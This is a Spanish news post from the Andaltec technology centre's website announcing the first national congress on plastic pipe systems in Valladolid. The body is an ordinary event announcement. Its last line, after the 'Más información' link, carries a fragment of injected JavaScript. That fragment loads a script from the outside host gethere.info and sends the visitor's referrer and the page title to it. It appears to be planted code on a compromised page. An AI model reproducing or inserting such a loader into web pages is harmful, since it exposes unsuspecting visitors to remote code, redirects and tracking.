Andaltec
Copyright Andaltec
Valladolid acogerá el primer Congreso Nacional de Sistemas de Tuberías Plásticas - Andaltec
Andaltec es un centro tecnológico especializado en sistemas de iluminación para automoción, plásticos en contacto con alimentos, prototipado y materiales.
plástico, iluminación, automoción, automóvil, envase, alimentario, ensayo, migración, enac, prototipo, ingeniería, faro, proyector, piloto, material, polímero, pintura, impresión, 3d, simulación, óptica, robot, formación, cad, proyecto, centro, tecnológico, innovación, martos, andalucía, I D I, led
27790
post-template-default,single,single-post,postid-27790,single-format-standard,bridge-core-1.0,ajax_fade,page_not_loaded,,qode_grid_1300,side_area_uncovered_from_content,footer_responsive_adv,qode-content-sidebar-responsive,qode-theme-ver-10.1,wpb-js-composer js-comp-ver-6.10.0,vc_responsive
 

Valladolid acogerá el primer Congreso Nacional de Sistemas de Tuberías Plásticas

Valladolid acogerá el primer Congreso Nacional de Sistemas de Tuberías Plásticas

Valladolid acoge los próximos días 28 y 29 de septiembre la primera edición del Congreso Nacional de Sistemas de Tuberías Plásticas, bajo el título «Nuevos desarrollos y tendencias en los sistemas de tuberías plásticas para conducción de agua».

Este evento pretende divulgar el conocimiento actualizado sobre las múltiples aplicaciones y posibilidades de los sistemas de tuberías plásticas en el ámbito de la obra civil y la edificación.

Estos sistemas, cada vez más utilizados en las obras hidraúlicas y en los edificios, han experimentado un gran avance tecnológico en los últimos tiempos que ha propiciado el desarrollo de materiales, productos y aplicaciones, que facilitan soluciones técnicas adaptadas a las necesidades actuales de las redes, principalmente eficiencia energética, ahorro de recursos y calidad del agua. En el congreso se abordarán temas de interés, entre otros, la utilización de aguas regeneradas, la gestión de aguas de tormenta, la modernización de regadíos, la reparación y renovación de redes, la instalaciones sin zanja, la reforma y rehabilitación de viviendas, las nuevas funcionalidades de la evacuación, la higiénica de los edificios y la climatización invisible.

El congreso está estructurado en dos jornadas independientes, la primera dedicada a la obra civil (28 septiembre) y la segunda a la edificación (29 septiembre).

Más información: www.asetub.es s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;